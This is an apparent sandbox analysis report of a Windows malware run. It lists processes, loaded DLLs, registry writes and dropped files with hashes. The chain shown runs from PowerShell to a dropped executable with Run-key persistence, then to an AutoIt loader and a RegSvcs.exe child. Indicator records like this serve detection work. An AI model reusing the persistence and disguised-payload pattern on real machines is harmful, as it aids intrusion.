c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

PID
2736
CMD
C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe C:\Users\admin\AppData\Local\Temp\88465914\VTOCI
Path
C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe
Indicators
Parent process
lwh.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
AutoIt Team
Description
AutoIt v3 Script
Version
3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\88465914\lwh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\mpr.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe

PID
1144
CMD
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Path
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Indicators
Parent process
lwh.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft .NET Services Installation Utility
Version
4.6.1055.0 built by: NETFXREL2
Modules
Image
c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\avicap32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\winmm.dll
c:\windows\system32\version.dll
c:\windows\system32\msvfw32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msacm32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll

Registry activity

Total events
1767
Read events
1609
Write events
156
Delete events
2

Modification events

PID
Process
Operation
Key
Name
Value
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{D6448701-150F-11E9-AA93-5254004A04AF}
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Type
4
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Count
3
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Time
E307010004000A0013002A0013003000
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Type
4
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Count
3
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Time
E307010004000A0013002A0013003000
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Window_Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF20000000200000004003000078020000
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links
Order
08000000020000000C01000001000000020000007E0000000000000070003200EC000000464B245120005355474745537E312E55524C0000540008000400EFBE454B974D464B24512A000000F94300000000020000000000000000000000000000005300750067006700650073007400650064002000530069007400650073002E00750072006C0000001C00000000000000820000000100000074003200E2000000464B24512000574542534C497E312E55524C0000580008000400EFBE454B864A464B24512A000000743E0000000003000000000000000000000000000000570065006200200053006C006900630065002000470061006C006C006500720079002E00750072006C0000001C00000000000000
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
B51852991CA9D401
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
71D752991CA9D401
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
Path
C:\Users\admin\Favorites\Links\Suggested Sites.url
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
Handler
{B0FA7D7C-7195-4F03-B03E-9DC1C9EBC394}
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
FeedUrl
https://ieonline.microsoft.com/#ieslice
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
DisplayName
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
ErrorState
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
DisplayMask
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
Path
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
Handler
{B0FA7D7C-7195-4F03-B03E-9DC1C9EBC394}
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
FeedUrl
http://go.microsoft.com/fwlink/?LinkId=121315
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
DisplayName
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
ErrorState
0
3000
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
DisplayMask
0
3440
iexplore.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018082720180903
3440
iexplore.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012018090920180910
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Type
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Count
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Time
E307010004000A0013002A001300AD00
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307010004000A0013002A001300CD00
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Type
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Count
3
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Time
E307010004000A0013002A0013001B01
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3440
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Microsoft Word
3440
iexplore.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Default MHTML Editor
Last
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "%1"
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019011020190111
CachePath
%USERPROFILE%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019011020190111
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019011020190111
CachePrefix
:2019011020190111:
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019011020190111
CacheLimit
8192
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019011020190111
CacheOptions
11
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012019011020190111
CacheRepair
0
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\iexplore
Type
1
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\iexplore
Flags
0
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\iexplore
Count
1
3440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\iexplore
Time
E307010004000A0013002A0026002500
3716
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3716
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3716
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{FFE2A43C-56B9-4BF5-9A79-CC6D4285608A} {00000122-0000-0000-C000-000000000046} 0xFFFF
01000000000000007032D7AA1CA9D401
3716
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication
Name
powershell.exe
3716
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
WfFyPbj
C:\Users\admin\AppData\Roaming\WfFyPbj.exe
3716
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3716
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2984
DllHost.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication
Name
DllHost.exe
2984
DllHost.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows Photo Viewer\Viewer
MainWndPos
6000000034000000A00400008002000000000000
2632
WfFyPbj.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2632
WfFyPbj.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2736
lwh.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
qwertyhfdsd.exe
C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe C:\Users\admin\AppData\Local\Temp\88465914\FLD_KT~1

Files activity

Executable files
2
Suspicious files
4
Text files
53
Unknown types
1

Dropped files

PID
Process
Filename
Type
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe
executable
MD5: c56b5f0201a3b3de53e561fe76912bfd
SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
3716
powershell.exe
C:\Users\admin\AppData\Roaming\WfFyPbj.exe
executable
MD5: b34a49301f280a04d59ab288630855ee
SHA256: e59515a8baa2988627ba68c97928f77d11fd11f93527c7359c2d7897fd5fd464
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\vsx.xl
text
MD5: 3fe745b71e5034d2298f195b27951796
SHA256: d8fc9b9a9bd3b7a51311be20b11632053c7331369f3bb8cc3e475f990ae224aa
3000
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF4BCC0002D6AE4369.TMP
––
MD5:  ––
SHA256:  ––
3000
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3X8NFKWBGMH5F213ROJI.temp
––
MD5:  ––
SHA256:  ––
3440
iexplore.exe
C:\Users\admin\AppData\Local\Temp\JavaDeployReg.log
text
MD5: 7a0b0f2e37cdcf3372d66ce551268c90
SHA256: 30b9eaa1128dde03611ce8afc723d0eabd92e7331f59dc9e3175f20595c94f64
3000
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{D6448702-150F-11E9-AA93-5254004A04AF}.dat
––
MD5:  ––
SHA256:  ––
3000
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF6422D1DA8995D7FE.TMP
––
MD5:  ––
SHA256:  ––
3768
lwh.exe
C:\Users\admin\AppData\Local\Temp\88465914\VTOCI
text
MD5: a2a05c7c5c6e1f0e321ff04d189c807b
SHA256: 8f4cb5c38052838d008e31a32b73489920b31765fe77d0e856d632396aa55c08
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\sut.bmp
text
MD5: 12d2ff5f2bd1226155cf398b2611f24c
SHA256: 5dbe01f939754dddc3bdb93f6973e6abc5f9f77d3db23ae408a2eba0bc91f0bc
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\tad.ico
text
MD5: 103b96bcb66f2209287408a5cbf39c54
SHA256: 91d3daa3d9736f8162035c883f2f03566f9fae655fffb758dfe1ace25d3c43fc
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\gcf.txt
text
MD5: b33c8f0b801470de2fabd49e5b3199cb
SHA256: e29f4464e89acd12cdeca9f02a383df2cddc9de841ab11ef749b56a7c78a95e6
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\cxq.icm
text
MD5: 23605c61108c31c4842542688d923607
SHA256: 0f3f8bbc33c4670c44f4aa278399390b974032707feb28d0ea6036bf5053cef3
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\dum.dat
text
MD5: d431ffef88fddf1d223cdedde385422c
SHA256: 066d8823d1d986cbcfab41c84909b5f3ff1911dc9b7e558ba08efabbf3d7ab30
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\pgk.mp3
text
MD5: e6280f412c6b8205fdc11bc1b40c7227
SHA256: b9937317673bb29304856556083e8147efa0ab3ef4d18bc9c185542098c7b8a3
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\dtb.mp4
text
MD5: 186821a6a76a497ba83f77c2eb694ddf
SHA256: 7057045ecfa6d5b5c645d174489883fb4baac3a51690378bc9fcf8f305e78d41
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\hwf.jpg
text
MD5: 1fc66383e0f54920395adf32b8f09dd2
SHA256: ae09367185471cbab68f65dbbd944b66d5591f7bc6b95b7684b99285c36dd245
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\toi.ppt
text
MD5: 5bc1af579a99121ac35ab6e3ff7d470b
SHA256: 1b2006d22c8b4b264339acc62b103785d73c735097a3147308067575c4367735
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\cao.mp3
text
MD5: 043f82458c6773f731b5696043c362da
SHA256: d59b678abd525d18297b899f27899119dc99464b15fe49f7fe56cd69ae7d6e70
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\mhp.mp4
text
MD5: 553707dc56652e93ccef5c41b70d98b0
SHA256: 56ea1dbace1467d0f3fae8649811d5c47b2dd837d9d28728147dea6ee0c0383b
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\esj.bmp
text
MD5: 94069010e2039643feb6b1a176c32914
SHA256: cedce64510a5d8add40b2dedc4eedfbd8877427c5f136c0a2aff8ce84d417a3b
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\qtj.xl
text
MD5: eb0f3fe4ce0a1084a869d54355d09c4d
SHA256: c04037373979c876eae016a9bd101d603ab8bd53f605aa49cde4c83798de15c8
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\brv.ppt
text
MD5: 02d041908329e615153fef40a54717ad
SHA256: ffa37afeddd510dc4731f20d0fbc9e4c16e0b4be08cef9d82b7e4ea4de339805
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\hoo.dat
text
MD5: 8f6f9814ba2e29d967309bb8e0a6380b
SHA256: 653c24e9331224c5215108d031334a9cf1131027800ec2caaf15642082145f01
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\rdk.pdf
text
MD5: b4df41efd6c800138a77be1761152e50
SHA256: a0c9b59353c09784c8a22090a444eb50f6a426ab1c1fbdb4b14a66a16007b39f
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\rcq.ico
text
MD5: 4d1d18662f21e21ef459232deada43f7
SHA256: 86ec0cb5c36dd91acf45577a049c82776328615910cad59c01f72ae907449f22
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\ldr.jpg
text
MD5: 421005e70abcbf87222d73d0d8c9ffbf
SHA256: 0d985b3ae47bceff4f774bc0498d21de91ad48436bebc42714a15d8428ca37f6
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\xnd.mp3
text
MD5: ce8320241e7e4d8ea08f632e0265a1f7
SHA256: c6cb40094e9771a469d59d5e30fbf5f537228551b5e9653ef1f056ccd7e24c96
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\lir.dat
text
MD5: 3a2ab15da2ae4b54778b55d0deb759c9
SHA256: 71994270ac757e6aa8ce7a03b9efbb0a7a7a4f0d71af80c9289cfcd1852654fd
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\nln.mp4
text
MD5: df9144baf063168d81b37fde1b5eb8c0
SHA256: c41f439b73af6a721e6f9cb8c16491854b0d47dfc1de8139a28060eac780a091
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\ils.icm
text
MD5: cf7c98814107d76fd65a8b1fa5e257f0
SHA256: c2c97e396c58b8586cad19af4d5fb3db14bbefa6df0d244fecc4683678457441
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\tst.mp4
text
MD5: b9a2c5e94ace453ac8bab48dc1fea869
SHA256: d958797f5d75d5803e3eb689b370de289995395c5764ad0298ff51eb91ba30d8
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\hrm.pdf
text
MD5: a8dd35c6c36f2c208d46c2189fa49a3c
SHA256: 66b1fdf9f7e71129a938ba8c8fe5bb4490d51a99b004bab9b5bf462404045156
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\sxr.txt
text
MD5: 72efb2da2feec77570c650a39589f28d
SHA256: cb1f1451cb7290c0391d1ff58578b7bfaf7213901789aeed3920703911fb4035
3440
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019011020190111\index.dat
dat
MD5: cba4d69dffafa00db6b321a46491d5ef
SHA256: ac378e39a16b3e8a1b83485d3563c690ef744d9c2b3428fd3d187bf15e561a97
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\qnf.pdf
text
MD5: fcc35763c67bcb2cc84d936278af25b1
SHA256: 0d14529aab80078efb3e893fd28beea72be9d5f4608f6e35dd233be19a76265d
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\qrf.xl
text
MD5: e5703142fab8fbbcbf5cd39c9378b32d
SHA256: ab4ffda173db74183f0760d868d8d8accfb975c10067e2b8c45b8c0a272c727d
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\hpk.pdf
text
MD5: bf620765985336d62fb99f99ad8cd3ec
SHA256: b0863d4738f7e36575f9bd2b37d68663f61198d6545cfa6547f936f460cdd458
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\fri.pdf
text
MD5: 5c350476642a993b84d53a6edf31b482
SHA256: d4dbfc1f4218fdeccd73cc16a29a7a7b3b6f098b2a5274496738eca3bbc14e6b
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\coa.icm
text
MD5: d4a678eddee78c562ef20901cd8c7bbd
SHA256: 605dfa8f9f1dee525c73ca29d8ef30edea733fc8e8a135cd6128460ce28c429e
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\etl.mp3
text
MD5: 6c39e2343bd4bedb8810ae1ca1f6e9c0
SHA256: 7f3050a43efbd6d2e67c43e11002a3c99ce47e06f39a99bf645a1cc1667a0efa
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\mtw.dat
text
MD5: 128157fad0851e016a9d8c75d03270a6
SHA256: c5f2a7e4e5dcd9f984c60fcc5d508202652c6e7a2d5b83c94041166fea6b6c14
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\bet.bmp
text
MD5: f7359b514d0a679665a288364b8b895a
SHA256: aa46e02d7052ae7af9843b20e2ded80af743b77624fb90aeb25481bdb608c2e4
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\oih.jpg
text
MD5: 263c44e198ae2328042ba3e3377a9cea
SHA256: 58e518fc888f0886748732308e17cf751e3e687c2c605bdd5f25084b61f29486
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\sip.dat
text
MD5: abae0d20c022f7da8fb7cba3b36154d5
SHA256: 92187287285f74f30b457f2a69936d9d120a9445d3f29509f3753652e32becee
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\jxn.txt
text
